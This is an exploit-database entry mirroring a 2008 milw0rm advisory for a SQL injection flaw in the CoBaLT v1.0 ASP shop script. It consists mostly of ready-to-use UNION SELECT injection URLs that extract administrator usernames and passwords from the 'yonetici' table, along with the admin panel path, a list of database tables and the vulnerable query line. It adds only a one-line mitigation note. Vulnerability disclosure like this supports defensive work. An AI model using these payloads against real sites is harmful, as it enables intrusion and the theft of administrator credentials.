CoBaLT v1.0 Remote SQL Injection Vulnerability

vendor:

CoBaLT v1.0

by:

U238

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: CoBaLT v1.0

Affected Version From: CoBaLT v1.0

Affected Version To: CoBaLT v1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:ugur238:cobalt_v1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

CoBaLT v1.0 Remote SQL Injection Vulnerability

CoBaLT v1.0 is vulnerable to remote SQL injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable application. This can be done by appending malicious SQL queries to the vulnerable parameter in the URL. For example, an attacker can send the following URL to the vulnerable application: http://xxx.org/cobaltv1/urun.asp?id=24+union+select+0,1,sifre,3,kadi+from+yonetici. This will allow the attacker to access the database and extract sensitive information such as usernames and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

CoBaLT v1.0 Remote SQL Ä°njection Vulnerabiltiy

Discovered : U238

Mail : setuid.noexec0x1@hotmail.com 

WebPage : http://ugur238.org (The End)


Script: http://www.aspindir.com/indir.asp?ID=5414

Script (Alternativ) : http://rapidshare.de/files/39031038/cobaltv.1.zip.html

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

Exploit:

http://localhost:2222/lab/cobaltv.1/urun.asp?id=24+union+select+0,1,sifre,3,kadi+from+yonetici

http://localhost:2222/lab/cobaltv.1/admin/bayi_listele.asp?git=duzenle&id=98+union+select+0,1,2,3,sifre,5,kadi,7,8+from+yonetici+where+id=2

----
http://localhost:2222/lab/cobaltv.1/admin/urun_grup_listele.asp?git=duzenle&id=24+union+select+0,kadi+from+yonetici

http://localhost:2222/lab/cobaltv.1/admin/urun_grup_listele.asp?git=duzenle&id=24+union+select+0,sifre+from+yonetici

----

http://localhost:2222/lab/cobaltv.1/admin/urun_listele.asp?id=1+union+select+kadi,sifre,kadi,sifre,sifre+from+yonetici


Admin Panel : localhost/path/admin 

Other Table : bayi - sepet - siparis - siparis_urun - urun - urun_grup - yonetici 


Dork : Sevmem bole seylerÄ± ,  abi anlamÄ±orum ne bos adamlarsÄ±nÄ±z  :( 


Error Code: 

      id=Request.QueryString("id")
 
      SQL="select * from sepet where id="&"id"


Example Site : http://xxx.org/cobaltv1/urun.asp?id=24+union+select+0,1,sifre,3,kadi+from+yonetici

_-_-_-_-_- NURCÄ°HAN _-_-_-_-_- BU SEVDA BÄ°TMEZ _-_-_-_-_- 4 YIL OLDU Amk

Greatz To : The_BekiR _-_ ka0x _-_ Nettoxic _-_ ZeberuS _-_ Str0ke 

# milw0rm.com [2008-04-05]